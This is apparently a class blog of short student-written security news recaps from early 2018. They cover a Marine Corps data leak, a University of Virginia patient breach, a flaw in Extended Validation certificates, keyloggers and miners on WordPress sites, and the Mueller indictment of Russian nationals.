Marine Force Data Leak

 

More than 20,000 US marine sailors Identities and information were exposed when an email with sensitive data was sent to the wrong email distribution list by the defense travel system (DTS).

 The email has an attachment that contains personal and sensitive data such as social security numbers, bank account information, credit card information, and mailing address.

Andrew Aranda, A spokesman from the Marine Forces, said that “no malicious intent was involved” and some changes will be made to prevent similar incidents from happening in the future.

According to Paul Edon, an Information Technology professional and director at Tripwire, there should be a regular checkup for the system and access limitation for sensitive information since these military systems store a lot of them.

With the expose of their personal information, victims should change their passwords and keep checking their bank accounts continuously in cases of any potential breach, said Paul Edon.

  • Mohammed Alhamadah  

Sources:

https://www.infosecurity-magazine.com/news/marines-21000-breach/

http://www.newsweek.com/us-marines-data-breach-leak-soldier-secrets-hits-21000-soldiers-civilians-825382

Advertisements

Patients’ info from University of Virginia at risk

The university of Virginia (UVA) has undergone issuing an apology for to the patients that had been effected by a data breach. On December 23, 2017, UVA became aware of an unauthorized third party that has had access to patient information from May 3, 2015 to December 27, 2016 through a laptop that was owned by one of the physicians of the university’s health system. The physician had access to patient records that would allow him to see information which includes: Patient name, diagnoses, treatment, date of birth and home address. A patient’s financial status or social security number was mentioned to not be accessible, but a patient’s healthcare information was not detailed in the report.
The university has been working with the FBI, where an internal investigation was done. The FBI has arrested the third party individual and can confirm from interrogation that patients’ information was not used or shared in any way. Letters have been sent out to the effected patients, about 1900 or so individuals, to review statements and verify information sent from their health insurance provider. If patients find incorrect info, a dedicated support line was opened by UVA for this matter. The call center specializes in assisting patients that look to correct or invalidate inquiries regarding the incident.
As for the security of UVA, they issued this statement: “We are sorry this happened and regret any inconvenience or concern this incident may cause our patients. To help prevent something like this from happening in the future, we are enhancing the security measures required to remotely access UVA Health System information.” The details behind UVA enhancing security has not been disseminated yet.
— Serge Louis

Sources: https://uvahealth.com/privacy-notice-for-uva-health-system-patients
https://www.scmagazine.com/2000-uva-health-system-patients-information-compromised/article/745936/
UVA Health System warns patients of data breach

Extended Validation is Broken

Extended Validation is a tool that can be used by site owners in order to prove the identity of their site beyond a standard HTTPS certificate.  While an HTTPS certificate proves that the server you are communicating with is the site identified by the domain name, it can be easy to spoof domain names for some sites (like facebok.com).  If a site is verified, a person may be likely to trust it without verifying the domain name.

In order to receive an Extended Validation certificate, one must prove to a Certificate Authority that they “are” that name, rather than just owning the domain name.  Most commonly, this is done by proving that you own a company by that name – which is a fairly secure system.  However, in this report, Ian Carroll exploits a vulnerability not in the technical system, but in the United States.

In America, the same company name can be registered in different states (since, for all practical purposes, we are 50 separate countries that are just really friendly).  Carroll takes advantage of this fact by registering the company name “Stripe, Inc.” in Kentucky (Stripe is a popular payment platform, registered in Delaware).  He uses the site registered with this certificate not for malicious purposes but in order to spread awareness of the vulnerability, hosting his whitepaper on the vulnerability there.

This issue raises many questions on how we should be verifying identity, as well as how browsers should deliver verification information to the client.  The entire vulnerability is completely technically sound in that the entire process does what it should (the company named “Stripe, Inc.” has been verified to serve this content).  There is, unfortunately no simple way to solve this problem.  Should the certificate authority only issue these certificates for companies that are “big” or, even more ambiguously, “well-known”, and deny verification to startups?  Should the browser also display the state name of registration along with the certificate (assuming that the common citizen knows the state name of every website he or she visits)?  These are not difficult answers, but their answers are fundamental to the future of identification in an increasingly automated world.

 

– Ryan Volz

Keyloggers and cryptocurrency mining on infected wordpress sites

About four weeks ago, (a little after the start of this class….. 🤔) it was discovered that thousands of WordPress sites were being used to mine Monero cryptocurrency, along with using a keylogger users’ login information, and possibly more. It functioned in such a way that users didn’t even have to hit the submit button in order to have their credentials stolen, and mining would start simply by visiting the page.

The keylogger runs on the entirety of the infected site, which opens the door for more than just WordPress logins to be captured, but also any data passed through the infected websites, such as possible bank credentials and e-mail addresses.

According to Bleeping Computer, 2,000 sites were infected by the keylogger. There’s no real way to tell if you are visiting an infected site without inspecting the source (and knowing what you’re looking for), so until the virus is wiped out, people should be wary of any WordPress managed site. If your browser suddenly starts eating up processing power when visiting a WordPress site, there is a good chance you’ve visited an infected one, and your computer is being used to mine Monero while you visit it.

Security experts still aren’t sure what caused the vulnerability aside from a blanket “WordPress is just bad”, and “this happens all the time to WordPress.”
Security experts are backing up their claims of WordPress’s dismal security practices by pointing out that within the past two months another entirely different keylogger was found infecting WordPress that infected 5,482 sites.
This entirely seperate keylogger was injected into Cloudflare scripts that used fake linter.js urls.

If the site has this malware running on it, there also is a chance that it also is using your computer to do cryptocurrency mining, but instead of mining only for Monero, this malware can mine whatever cryptocurrency the hacker so decides.

WordPress is so prone to hacking that there is a monthly journal to keep track of what wordpress vulnerabilities were found. Though it is hard to keep 18.9% of the internet running safely, and though it is easy to blame wordpress for not handling these attacks, part of the responsibility does lie with the admins of the pages.
However, the fact that wordpress seems to be this insecure just shows the kind of caution you need when going anywhere online.

-Skyler Clark

https://hotforsecurity.bitdefender.com/blog/keylogger-found-on-thousands-of-wordpress-based-sites-stealing-every-keypress-as-you-type-19501.html

https://blog.sucuri.net/2017/12/cloudflare-solutions-keylogger-on-thousands-of-infected-wordpress-sites.html

https://www.wordfence.com/blog/category/wordpress-security/

Russian Conspiracy

Since May 2017, Robert Muller who is Special Counsel for the United States Department of Justice and former Director of the FBI has been leading an investigation into possible security breaches during the 2016 presidential elections. Prior to February 16, 2018, Muller’s investigation had secured two guilty pleas and reportedly another charged suspect is to plead guilty to conspiracy against the United States.

On February 16, 2018, Special Counsel Robert Muller filled charges against 13 Russian nationals for conspiracy to defraud the United States. It is suspected that these Russian Nationals intent was to create massive discord in the American Political Arena. They accomplished this by actively campaigning against Hillary during the campaign. These Russian Nationals are suspected of entering the United States under these false pretenses and using fake identities (provided by Californian citizen Richard Pinedo who has plead guilty to identity fraud). By pretending to be Americans the Russian Agents were able to pay American citizens to attend rallies against Hillary Clinton and push a pro-Trump narrative.

This indictment prime actor is Russia’s Internet Research Agency (otherwise known as the Troll Factory). The Agency accused of creating thousands of online accounts to spread anti-Hillary sentiment within the United States. Twitter alone has stated that it has banned 3100 accounts for being associated with the Troll Farm. The agency employs VPN technology to appear as if they are logging in from devices located in America making their work difficult to track. It is unknown how much the effects of the Internet Research Agency’s Efforts have had on the United States election. It is unknown how widespread current efforts of this agency are.

It is unlikely that any of the accused will ever see a judge for all the suspects are currently located in Russia. A Russin spokesperson has stated that the accusations are absurd and none of the Nationals will likely be subject to extradition.

 

Source:

https://www.politico.com/story/2018/02/16/trump-russia-indictments-mueller-investigation-415667

List of all charges brought by the investigation:

https://en.wikipedia.org/wiki/Special_Counsel_investigation_(2017%E2%80%93present)#Charges

Full indictment (PDF):

https://www.justice.gov/file/1035477/download